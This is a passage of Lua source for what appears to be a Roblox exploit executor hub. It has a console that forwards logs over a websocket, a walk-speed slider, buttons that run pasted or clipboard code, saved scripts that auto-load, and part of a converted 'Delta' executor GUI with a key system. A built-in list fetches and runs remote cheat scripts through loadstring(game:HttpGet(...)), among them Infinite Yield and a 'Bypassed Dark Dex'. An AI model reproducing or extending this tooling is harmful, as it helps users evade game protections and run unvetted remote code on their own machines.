string.gsub(s, "\t", " ") end function Utility.removeControlChars(s: string): string return string.gsub(s, "[\0\1\2\3\4\5\6\7\8\11\12\13\14\15\16\17\18\19\20\21\22\23\24\25\26\27\28\29\30\31]+", "") end function Utility.getInnerAbsoluteSize(textObject: types.TextObject): Vector2 local fullSize = textObject.AbsoluteSize local padding: UIPadding? = textObject:FindFirstChildWhichIsA("UIPadding") if padding then local offsetX = padding.PaddingLeft.Offset + padding.PaddingRight.Offset local scaleX = (fullSize.X * padding.PaddingLeft.Scale) + (fullSize.X * padding.PaddingRight.Scale) local offsetY = padding.PaddingTop.Offset + padding.PaddingBottom.Offset local scaleY = (fullSize.Y * padding.PaddingTop.Scale) + (fullSize.Y * padding.PaddingBottom.Scale) return Vector2.new(fullSize.X - (scaleX + offsetX), fullSize.Y - (scaleY + offsetY)) else return fullSize end end function Utility.getTextBounds(textObject: types.TextObject): Vector2 if textObject.ContentText == "" then return Vector2.zero end local textBounds = textObject.TextBounds -- Wait for TextBounds to be non-NaN and non-zero because Roblox while (textBounds.Y ~= textBounds.Y) or (textBounds.Y < 1) do task.wait() textBounds = textObject.TextBounds end return textBounds end return Utility end task.spawn(function() local script = trii.GlobalLog _G.logPrint = true _G.logWarn = true _G.logError = true _G.logInfo = false local TextService = game:GetService("TextService") local LogService = game:GetService("LogService") local frame = script.Parent local messageBox = frame:WaitForChild("TextBox") messageBox.RichText = true messageBox.Selectable = false messageBox.Active = false local function formatMessage(message, messageType) local color = "" local formattedType = "" if messageType == Enum.MessageType.MessageOutput then color = "#cffeff" formattedType = "Print" elseif messageType == Enum.MessageType.MessageWarning then color = "#ffa73b" formattedType = "Warn" elseif messageType == Enum.MessageType.MessageError then color = "#FF005D" formattedType = "Error" elseif messageType == Enum.MessageType.MessageInfo then color = "#5cb0ff" formattedType = "Info" else color = "#FFFFFF" formattedType = "Other" end return string.format('[%s] %s', color, formattedType, message) end local function formatMessage2(message, messageType) local formattedType = "" if messageType == Enum.MessageType.MessageOutput then formattedType = "Print" elseif messageType == Enum.MessageType.MessageWarning then formattedType = "Warn" elseif messageType == Enum.MessageType.MessageError then formattedType = "Error" elseif messageType == Enum.MessageType.MessageInfo then formattedType = "Info" else formattedType = "Other" end return string.format('[%s] %s', formattedType, message) end local function updateMessageBoxSize() local textSize = TextService:GetTextSize( messageBox.Text, messageBox.TextSize, messageBox.Font, Vector2.new(messageBox.AbsoluteSize.X, 20000) ) messageBox.Size = UDim2.new(messageBox.Size.X.Scale, messageBox.Size.X.Offset, 0, textSize.Y) end local function onMessageOut(message, messageType) if not _G.logInfo then return end if (messageType == Enum.MessageType.MessageOutput and not _G.logPrint) or (messageType == Enum.MessageType.MessageWarning and not _G.logWarn) or (messageType == Enum.MessageType.MessageError and not _G.logError)then return end local timeStamp = os.date("%X") local formattedMessage = formatMessage(message, messageType) local formattedMessage2 = formatMessage2(message, messageType) local logmsg = messageBox.Text .. timeStamp .. " - " .. formattedMessage .. "\n" local logmsg2 = formattedMessage2 messageBox.Text = logmsg if _G.wsConnection then task.wait() local success, err = pcall(function() _G.ws:Send(tostring(logmsg2)) end) if not success then print("Error sending message, ws:Send") end end updateMessageBoxSize() frame.CanvasPosition = Vector2.new(0, messageBox.TextBounds.Y) end LogService.MessageOut:Connect(onMessageOut) end) task.spawn(function() local script = trii.LocalPlayerHandle -- Services local Players = game:GetService("Players") --local plr property local lplayer = Players.LocalPlayer local character = lplayer.Character or lplayer.CharacterAdded:Wait() -- Modules local FormSliderClass = require(script.Parent:WaitForChild("FormSliderClass")) -- GUI Variables local WalKSpeedSlider = script.Parent:WaitForChild("walkspeed"):WaitForChild("Slider") local JumpSpeedSlider = script.Parent:WaitForChild("jumspeed"):WaitForChild("Slider") local curpos = script.Parent:WaitForChild("CurPos") -- Add slider functionality local WalKSpeedSliderSet = FormSliderClass.new(WalKSpeedSlider, Enum.Axis.X, 0, 50) -- Horizontal, -> paramGuiObject, paramDirection, minvalue, maxvalue slider -- Meow WalKSpeedSlider:GetAttributeChangedSignal("ValuePercent"):Connect(function() --print(WalKSpeedSlider:GetAttribute("ValuePercent"), WalKSpeedSlider:GetAttribute("ValueIncrement")) WalKSpeedSlider.Parent.Title.Text = "Player Walk Speed: "..math.floor(WalKSpeedSlider:GetAttribute("ValuePercent")) character.Humanoid.WalkSpeed = math.floor(WalKSpeedSlider:GetAttribute("ValuePercent")) end) coroutine.resume(coroutine.create(function() while wait() do if character then local vector = character.HumanoidRootPart.Position local pos = Vector3.new(math.floor(vector.X), math.floor(vector.Y), math.floor(vector.Z)) curpos.Text = "Current Position: "..tostring(pos) end end end)) end) task.spawn(function() local script = trii.LocalScript local Highlighter = require(script.Parent.ScriptBox.Highlighter) local myTextLabel = script.Parent.ScriptBox Highlighter.highlight({ textObject = myTextLabel, }) end) task.spawn(function() local script = trii.LocalScript_1 local plr = game.Players.LocalPlayer local MainFrame = script.Parent.MainFrame local buttons = MainFrame.BottomMenuFrame.MenuList local execBtn = buttons:WaitForChild("ExecBtn") local cloudBtn = buttons:WaitForChild("CloudBtn") local HBtn = buttons:WaitForChild("HBtn") local settingsBtn = buttons:WaitForChild("SettingsBtn") local execFrame = MainFrame:WaitForChild("ExecFrame") local logFrame = MainFrame:WaitForChild("logFrame") local homeFrame = MainFrame:WaitForChild("homeFrame") local settingsFrame = MainFrame:WaitForChild("SettingsFrame") local excbtn = execFrame.Buttons.Button1 local execlipbtn = execFrame.Buttons.Button2 local pastebtn = execFrame.Buttons.Button3 local clearbtn = execFrame.Buttons.Button4 local ScriptBox = execFrame.ScrollingFrame.ScriptBox local ExitBtn = MainFrame.BottomMenuFrame.LeftFrame.ExitBtn ----//////////////////---- ----/// Menu Buttons ----//////////////////---- local function hideAllFrames() execFrame.Visible = false logFrame.Visible = false homeFrame.Visible = false settingsFrame.Visible = false execBtn.UIStroke.Enabled = false HBtn.UIStroke.Enabled = false cloudBtn.UIStroke.Enabled = false settingsBtn.UIStroke.Enabled = false end local function showFrame(frame, btn) hideAllFrames() task.wait() frame.Visible = true btn.UIStroke.Enabled = true end execBtn.Activated:Connect(function() showFrame(execFrame, execBtn) end) cloudBtn.Activated:Connect(function() showFrame(logFrame, cloudBtn) end) HBtn.Activated:Connect(function() showFrame(homeFrame, HBtn) end) settingsBtn.Activated:Connect(function() showFrame(settingsFrame, settingsBtn) end) hideAllFrames() homeFrame.Visible = true ----//////////////////---- ----/// Exec Buttons ----//////////////////---- excbtn.Activated:Connect(function() excbtn.UIStroke.Enabled = true executecode(ScriptBox.Text) wait(0.1) excbtn.UIStroke.Enabled = false end) execlipbtn.Activated:Connect(function() execlipbtn.UIStroke.Enabled = true executecode(getclipboard()) wait(0.1) execlipbtn.UIStroke.Enabled = false end) pastebtn.Activated:Connect(function() pastebtn.UIStroke.Enabled = true ScriptBox.Text = getclipboard() wait(0.1) pastebtn.UIStroke.Enabled = false end) clearbtn.Activated:Connect(function() clearbtn.UIStroke.Enabled = true ScriptBox.Text = "" wait(0.1) clearbtn.UIStroke.Enabled = false end) ----//////////////////---- ----/// Other ----//////////////////---- ExitBtn.Activated:Connect(function() script.Parent.Enabled = not script.Parent.Enabled end) ScriptBox.Focused:Connect(function() for _, item in pairs(ScriptBox.SyntaxHighlights:GetChildren()) do item.Visible = false end end) ScriptBox.FocusLost:Connect(function() for _, item in pairs(ScriptBox.SyntaxHighlights:GetChildren()) do item.Visible = true end end) ----//////////////////---- ----/// Default Page ----//////////////////---- local HttpService = game:GetService("HttpService") local jsonString = [[ { "15842384180x": { "_scripts": [ {"scriptName": "Script 1", "text": "script executed"}, {"scriptName": "script 2", "text": "script executed"} ] }, "987654321": { "_scripts": [ {"scriptName": "scriptName 3", "text": "Quote 1 from scriptName 3 in Game 987654321"} ] }, "global": { "_scripts": [ {"scriptName": "Infinite Yield", "text": "loadstring(game:HttpGet(\"https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source\",true))()"}, {"scriptName": "Dark Dex v4", "text": "getgenv().Key = \"Bash\" loadstring(game:HttpGet(\"https://raw.githubusercontent.com/Hosvile/Refinement/main/MC%3AIY%20Dex\",true))()"}, {"scriptName": "Bypassed Dark Dex v3", "text": "loadstring(game:HttpGet('https://raw.githubusercontent.com/Babyhamsta/RBLX_Scripts/main/Universal/BypassedDarkDexV3.lua', true))()"} ] } } ]] local scriptList = HttpService:JSONDecode(jsonString) local scriptsFrame = MainFrame.homeFrame.scriptsFrame local scriptButton = scriptsFrame.TextButton local currentPlaceId = tostring(game.PlaceId) scriptsFrame["#GameHeader"].Title.Text = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name local function createscriptButtons(_scripts) local yPos = 0 for i, scriptData in ipairs(_scripts) do local newButton = scriptButton:Clone() newButton.Parent = scriptsFrame newButton.Text = scriptData.scriptName newButton.Position = UDim2.new(newButton.Position.X.Scale, newButton.Position.X.Offset, newButton.Position.Y.Scale, yPos) yPos = yPos + newButton.Size.Y.Offset + 5 newButton.Visible = true newButton.MouseButton1Click:Connect(function() --print(scriptData.text) executecode(scriptData.text) end) end end local scriptToUse if scriptList[currentPlaceId] and scriptList[currentPlaceId]._scripts then scriptToUse = scriptList[currentPlaceId]._scripts elseif scriptList["global"] and scriptList["global"]._scripts then scriptToUse = scriptList["global"]._scripts end if scriptToUse then createscriptButtons(scriptToUse) else print("No _scripts available.") end scriptButton.Visible = false ----//////////////////---- ----/// Console Log Page ----//////////////////---- logButtons = logFrame.logButtons consoleFrame = logFrame.consoleFrame outputCBX = logButtons.logOutput.Button warningCBX = logButtons.logWarning.Button errorCBX = logButtons.logError.Button infoCBX = logButtons.logInfo.Button consoleclrbtn = logButtons.cclrbtn consoleexebtn = logButtons.excp local function ccupdt(value, button) if _G[value] then button.Image = "rbxassetid://3926305904" button.ImageRectSize = Vector2.new(36, 36) button.ImageRectOffset = Vector2.new(724, 724) else button.Image = "rbxassetid://3926311105" button.ImageRectSize = Vector2.new(48, 48) button.ImageRectOffset = Vector2.new(4, 836) end end consoleexebtn.Activated:Connect(function() executecode(getclipboard()) end) outputCBX.Activated:Connect(function() ccupdt("logPrint",outputCBX) _G.logPrint = not _G.logPrint print(_G.logPrint) end) warningCBX.Activated:Connect(function() ccupdt("logWarn",warningCBX) _G.logWarn = not _G.logWarn end) errorCBX.Activated:Connect(function() ccupdt("logError",errorCBX) _G.logError = not _G.logError end) infoCBX.Activated:Connect(function() ccupdt("logInfo",infoCBX) _G.logInfo = not _G.logInfo end) consoleclrbtn.Activated:Connect(function() consoleFrame.TextBox.Text = "" end) end) task.spawn(function() local script = trii.savescripts HttpService = game:GetService("HttpService") folderName = 'Local_Scripts' fileName = 'list.json' filePath = folderName .. '/' .. fileName lsf = script.Parent.MainFrame.homeFrame.localscriptsFrame alsf = script.Parent.MainFrame.homeFrame.addlocalscriptsFrame add_btn = lsf["#GameHeader"].Add_btn.TextButton script_placeholder = lsf.script_placeholder script_placeholder.Visible = false title = script_placeholder.scriptTitle buttons = script_placeholder.Buttons run = buttons.run.button autoload = buttons.autoload.button delete = buttons.delete.button scriptNameinput = alsf.addFrame.input.TextBox confirm_btn = alsf.addFrame.confrim_btn.TextButton cancel_btn = alsf.addFrame.cancel_btn.TextButton local default_scripts = { localscripts = { script_name = { name = "print epic!", script = "print(\"epic\")", auto_load = false } } } local _scripts = {} local function merge_scripts(defaults, loaded_scripts) for key, value in pairs(defaults) do if type(value) == "table" then loaded_scripts[key] = loaded_scripts[key] or {} merge_scripts(value, loaded_scripts[key]) else loaded_scripts[key] = loaded_scripts[key] or value end end end local function read_scripts() if not isfolder(folderName) then makefolder(folderName) end if isfile(filePath) then local fileContents = readfile(filePath) local success, decoded = pcall(function() return HttpService:JSONDecode(fileContents) end) if success then merge_scripts(default_scripts, decoded) return decoded end end return default_scripts end local function save_scripts() local encoded = HttpService:JSONEncode(_scripts) writefile(filePath, encoded) print("_scripts saved.") end local function deleteScript(scriptName) if _scripts.localscripts[scriptName] then _scripts.localscripts[scriptName] = nil warn("Deleted: " .. scriptName) save_scripts() else warn("Script not found: " .. scriptName) end end _scripts = read_scripts() local function execute_(scriptName) if isfile(filePath) then local fileContents = readfile(filePath) local success, decoded = pcall(function() return HttpService:JSONDecode(fileContents) end) if success and decoded.localscripts then local scriptData = decoded.localscripts[scriptName] if scriptData then executecode(scriptData.script) else warn("Script not found:", scriptName) end else warn("Failed to decode _scripts or 'localscripts' not found.") end else print(filePath) warn("_scripts file does not exist.") end end local function updateAutoLoad(scriptName, autoLoadValue, btn) if _scripts.localscripts and _scripts.localscripts[scriptName] then _scripts.localscripts[scriptName].auto_load = autoLoadValue save_scripts() print("Updated auto_load for", _scripts.localscripts[scriptName].name, "to", autoLoadValue) if not autoLoadValue then btn.Image = "rbxassetid://3926305904" btn.ImageRectSize = Vector2.new(36, 36) btn.ImageRectOffset = Vector2.new(724, 724) else btn.Image = "rbxassetid://3926311105" btn.ImageRectSize = Vector2.new(48, 48) btn.ImageRectOffset = Vector2.new(4, 836) end else warn("Failed to update auto_load. Script not found or error in _scripts.") end end local function convertScriptName(name) local convertedName = name:gsub("%s+", "_") convertedName = convertedName:gsub("%W", "") return convertedName end local function setupScriptUI(scriptName, scriptData) local scriptUI = script_placeholder:Clone() scriptUI.Visible = true scriptUI.scriptTitle.Text = scriptData.name scriptUI.Buttons.run.button.Activated:Connect(function() execute_(scriptName) end) scriptUI.Buttons.autoload.button.Activated:Connect(function() local newAutoLoadValue = not scriptData.auto_load updateAutoLoad(scriptName, newAutoLoadValue, scriptUI.Buttons.autoload.button) scriptData.auto_load = newAutoLoadValue end) scriptUI.Buttons.delete.button.Activated:Connect(function() deleteScript(scriptName) scriptUI:Destroy() end) scriptUI.Parent = lsf if scriptData.auto_load then scriptUI.Buttons.autoload.button.Image = "rbxassetid://3926311105" scriptUI.Buttons.autoload.button.ImageRectSize = Vector2.new(48, 48) scriptUI.Buttons.autoload.button.ImageRectOffset = Vector2.new(4, 836) execute_(scriptName) end end local function setupAllScriptsUI() for scriptName, scriptData in pairs(_scripts.localscripts) do setupScriptUI(scriptName, scriptData) end end local function add_update(scriptName, name, scriptContent, autoLoad) print("adding") local isNewScript = not _scripts.localscripts[tostring(scriptName)] _scripts.localscripts[tostring(scriptName)] = { name = tostring(name), script = tostring(scriptContent), auto_load = autoLoad } save_scripts() if isNewScript then setupScriptUI(tostring(scriptName), _scripts.localscripts[tostring(scriptName)]) end end confirm_btn.Activated:Connect(function() local scriptName = scriptNameinput.Text local convertedName = convertScriptName(scriptName) local xscript = getclipboard() warn(scriptName, convertedName, xscript) task.wait() if convertedName ~= "" then print("correct") lsf.Visible = true add_update(convertedName, scriptName, xscript, false) scriptNameinput.Text = "" else scriptNameinput.Parent.Parent.Title.Text = "Script Name: Invalid script name" wait(2) scriptNameinput.Parent.Parent.Title.Text = "Script Name:" warn("Invalid script name") end end) add_btn.Activated:Connect(function() lsf.Visible = false end) cancel_btn.Activated:Connect(function() lsf.Visible = true end) setupAllScriptsUI() end) end wait(2) main() loader() print("---><---") pcall(function() for i,v in pairs(arceus.listarceusfiles("Autoexec")) do executecode(arceus.readarceusfile(v)) end end) end) Section:NewButton("Delta Old Gui", "delta old", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] --[=[ d888b db db d888888b .d888b. db db db .d8b. 88' Y8b 88 88 `88' VP `8D 88 88 88 d8' `8b 88 88 88 88 odD' 88 88 88 88ooo88 88 ooo 88 88 88 .88' 88 88 88 88~~~88 88. ~8~ 88b d88 .88. j88. 88booo. 88b d88 88 88 Y888P ~Y8888P' Y888888P 888888D Y88888P ~Y8888P' YP YP CONVERTER ]=] makefolder("d_android_script_dir") if _G.is_deltaandroid_loaded then print("already running") return end _G.is_deltaandroid_loaded = true -- Instances: 310 | Scripts: 28 | Modules: 24 local G2L = {}; -- StarterGui.DeltaGui G2L["1"] = Instance.new("ScreenGui", gethui()); G2L["1"]["Name"] = [[DeltaGui]]; G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling; -- StarterGui.DeltaGui.KeySystem G2L["2"] = Instance.new("Folder", G2L["1"]); G2L["2"]["Name"] = [[KeySystem]]; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame G2L["3"] = Instance.new("Frame", G2L["2"]); G2L["3"]["BackgroundColor3"] = Color3.fromRGB(20, 20, 23); G2L["3"]["Size"] = UDim2.new(0.76389479637146, 0, 0.4519544541835785, 0); G2L["3"]["Position"] = UDim2.new(0.11660274863243103, 0, 0.275360107421875, 0); G2L["3"]["Visible"] = false; G2L["3"]["Name"] = [[MainKeyFrame]]; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideFrame G2L["4"] = Instance.new("Frame", G2L["3"]); G2L["4"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["4"]["BackgroundTransparency"] = 1; G2L["4"]["Size"] = UDim2.new(0.11645293235778809, 0, 1.0000001192092896, 0); G2L["4"]["Name"] = [[SideFrame]]; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideFrame.Logo G2L["5"] = Instance.new("ImageLabel", G2L["4"]); G2L["5"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["5"]["Image"] = [[rbxassetid://12730597972]]; G2L["5"]["Size"] = UDim2.new(1.0185703039169312, 0, 0.3629874587059021, 0); G2L["5"]["Name"] = [[Logo]]; G2L["5"]["BackgroundTransparency"] = 1; G2L["5"]["Position"] = UDim2.new(-0.018570121377706528, 0, 0.06093369424343109, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideFrame.Logo.UIAspectRatioConstraint G2L["6"] = Instance.new("UIAspectRatioConstraint", G2L["5"]); G2L["6"]["AspectRatio"] = 0.9946909546852112; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideFrame.Frame G2L["7"] = Instance.new("Frame", G2L["4"]); G2L["7"]["BackgroundColor3"] = Color3.fromRGB(72, 72, 72); G2L["7"]["Size"] = UDim2.new(0, 0, 0.9890000224113464, 0); G2L["7"]["BorderColor3"] = Color3.fromRGB(72, 72, 72); G2L["7"]["Position"] = UDim2.new(1, 0, 0.004999999888241291, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideFrame.Frame.UICorner G2L["8"] = Instance.new("UICorner", G2L["7"]); G2L["8"]["CornerRadius"] = UDim.new(0.09000000357627869, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideTextbox G2L["9"] = Instance.new("Frame", G2L["3"]); G2L["9"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["9"]["BackgroundTransparency"] = 0.33329999446868896; G2L["9"]["Size"] = UDim2.new(0.8421385884284973, 0, 0.5559701919555664, 0); G2L["9"]["BorderColor3"] = Color3.fromRGB(16, 16, 16); G2L["9"]["Position"] = UDim2.new(0.13729187846183777, 0, 0.11194030940532684, 0); G2L["9"]["Name"] = [[SideTextbox]]; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideTextbox.MainTextBox G2L["a"] = Instance.new("TextBox", G2L["9"]); G2L["a"]["TextSize"] = 13; G2L["a"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["a"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["a"]["BackgroundColor3"] = Color3.fromRGB(16, 16, 16); G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["a"]["BackgroundTransparency"] = 1; G2L["a"]["PlaceholderText"] = [[Enter Your Key Here]]; G2L["a"]["Size"] = UDim2.new(0.9665210843086243, 0, 0.8322147727012634, 0); G2L["a"]["BorderColor3"] = Color3.fromRGB(16, 16, 16); G2L["a"]["Text"] = [[]]; G2L["a"]["Position"] = UDim2.new(0.020378457382321358, 0, 0.08053690940141678, 0); G2L["a"]["Name"] = [[MainTextBox]]; G2L["a"]["ClearTextOnFocus"] = false; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideTextbox.MainTextBox.UICorner G2L["b"] = Instance.new("UICorner", G2L["a"]); G2L["b"]["CornerRadius"] = UDim.new(0.09000000357627869, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.SideTextbox.UICorner G2L["c"] = Instance.new("UICorner", G2L["9"]); G2L["c"]["CornerRadius"] = UDim.new(0.09000000357627869, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.UICorner G2L["d"] = Instance.new("UICorner", G2L["3"]); G2L["d"]["CornerRadius"] = UDim.new(0.09000000357627869, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.UIAspectRatioConstraint G2L["e"] = Instance.new("UIAspectRatioConstraint", G2L["3"]); G2L["e"]["AspectRatio"] = 3.0439562797546387; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.Continue G2L["f"] = Instance.new("Frame", G2L["3"]); G2L["f"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["f"]["Size"] = UDim2.new(0.19932664930820465, 0, 0.1760299652814865, 0); G2L["f"]["Position"] = UDim2.new(0.13534526526927948, 0, 0.7490636706352234, 0); G2L["f"]["Name"] = [[Continue]]; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.Continue.TextButton G2L["10"] = Instance.new("TextButton", G2L["f"]); G2L["10"]["TextWrapped"] = true; G2L["10"]["TextScaled"] = true; G2L["10"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["10"]["TextSize"] = 14; G2L["10"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["10"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["10"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["10"]["Text"] = [[Continue]]; G2L["10"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.Continue.TextButton.UICorner G2L["11"] = Instance.new("UICorner", G2L["10"]); G2L["11"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.Continue.TextButton.LocalScript G2L["12"] = Instance.new("LocalScript", G2L["10"]); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.Continue.TextButton.UITextSizeConstraint G2L["13"] = Instance.new("UITextSizeConstraint", G2L["10"]); G2L["13"]["MaxTextSize"] = 14; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.Continue.UICorner G2L["14"] = Instance.new("UICorner", G2L["f"]); G2L["14"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.Continue.ImageLabel G2L["15"] = Instance.new("ImageLabel", G2L["f"]); G2L["15"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["15"]["Image"] = [[rbxassetid://12730588268]]; G2L["15"]["Size"] = UDim2.new(0.1541670262813568, 0, 0.5313842296600342, 0); G2L["15"]["BackgroundTransparency"] = 1; G2L["15"]["Position"] = UDim2.new(0.6577792763710022, 0, 0.2479792982339859, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.GetKey G2L["16"] = Instance.new("Frame", G2L["3"]); G2L["16"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["16"]["Size"] = UDim2.new(0.19932664930820465, 0, 0.1760299652814865, 0); G2L["16"]["Position"] = UDim2.new(0.34697607159614563, 0, 0.7490636706352234, 0); G2L["16"]["Name"] = [[GetKey]]; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.GetKey.TextButton G2L["17"] = Instance.new("TextButton", G2L["16"]); G2L["17"]["TextWrapped"] = true; G2L["17"]["TextScaled"] = true; G2L["17"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["17"]["TextSize"] = 14; G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["17"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["17"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["17"]["Text"] = [[Get Key]]; G2L["17"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.GetKey.TextButton.UICorner G2L["18"] = Instance.new("UICorner", G2L["17"]); G2L["18"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.GetKey.TextButton.LocalScript G2L["19"] = Instance.new("LocalScript", G2L["17"]); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.GetKey.TextButton.UITextSizeConstraint G2L["1a"] = Instance.new("UITextSizeConstraint", G2L["17"]); G2L["1a"]["MaxTextSize"] = 14; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.GetKey.UICorner G2L["1b"] = Instance.new("UICorner", G2L["16"]); G2L["1b"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.GetKey.ImageLabel G2L["1c"] = Instance.new("ImageLabel", G2L["16"]); G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["1c"]["Image"] = [[rbxassetid://12730592157]]; G2L["1c"]["Size"] = UDim2.new(0.14388921856880188, 0, 0.4959585964679718, 0); G2L["1c"]["BackgroundTransparency"] = 1; G2L["1c"]["Position"] = UDim2.new(0.6577792763710022, 0, 0.2479792982339859, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.JoinServer G2L["1d"] = Instance.new("Frame", G2L["3"]); G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["1d"]["Size"] = UDim2.new(0.23844483494758606, 0, 0.1760299652814865, 0); G2L["1d"]["Position"] = UDim2.new(0.5598372220993042, 0, 0.7490636706352234, 0); G2L["1d"]["Name"] = [[JoinServer]]; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.JoinServer.TextButton G2L["1e"] = Instance.new("TextButton", G2L["1d"]); G2L["1e"]["TextWrapped"] = true; G2L["1e"]["TextScaled"] = true; G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["1e"]["TextSize"] = 14; G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["1e"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["1e"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["1e"]["Text"] = [[Join Discord]]; G2L["1e"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.JoinServer.TextButton.UICorner G2L["1f"] = Instance.new("UICorner", G2L["1e"]); G2L["1f"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.JoinServer.TextButton.LocalScript G2L["20"] = Instance.new("LocalScript", G2L["1e"]); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.JoinServer.TextButton.UITextSizeConstraint G2L["21"] = Instance.new("UITextSizeConstraint", G2L["1e"]); G2L["21"]["MaxTextSize"] = 14; -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.JoinServer.UICorner G2L["22"] = Instance.new("UICorner", G2L["1d"]); G2L["22"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.KeySystem.MainKeyFrame.JoinServer.ImageLabel G2L["23"] = Instance.new("ImageLabel", G2L["1d"]); G2L["23"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["23"]["Image"] = [[rbxassetid://12730595164]]; G2L["23"]["Size"] = UDim2.new(0.11047418415546417, 0, 0.4959585964679718, 0); G2L["23"]["BackgroundTransparency"] = 1; G2L["23"]["Position"] = UDim2.new(0.6944091320037842, 0, 0.2479792982339859, 0); -- StarterGui.DeltaGui.MainUi G2L["24"] = Instance.new("Folder", G2L["1"]); G2L["24"]["Name"] = [[MainUi]]; -- StarterGui.DeltaGui.MainUi.MainFrame G2L["25"] = Instance.new("Frame", G2L["24"]); G2L["25"]["Active"] = true; G2L["25"]["BackgroundColor3"] = Color3.fromRGB(20, 20, 23); G2L["25"]["Size"] = UDim2.new(0.6537454724311829, 0, 0.9718542695045471, 0); G2L["25"]["Position"] = UDim2.new(0.17294080555438995, 0, 0.013245033100247383, 0); G2L["25"]["Visible"] = true; G2L["25"]["Name"] = [[MainFrame]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame G2L["26"] = Instance.new("Frame", G2L["25"]); G2L["26"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["26"]["BackgroundTransparency"] = 1; G2L["26"]["Size"] = UDim2.new(0.11645293235778809, 0, 1.0000001192092896, 0); G2L["26"]["Name"] = [[SideFrame]]; -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Logo G2L["27"] = Instance.new("ImageLabel", G2L["26"]); G2L["27"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["27"]["Image"] = [[rbxassetid://12730597972]]; G2L["27"]["Size"] = UDim2.new(1.0080041885375977, 0, 0.1372550129890442, 0); G2L["27"]["Name"] = [[Logo]]; G2L["27"]["BackgroundTransparency"] = 1; G2L["27"]["Position"] = UDim2.new(0.013000000268220901, 0, 0.022535257041454315, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.SideFrame.Logo.UIAspectRatioConstraint G2L["28"] = Instance.new("UIAspectRatioConstraint", G2L["27"]); -- 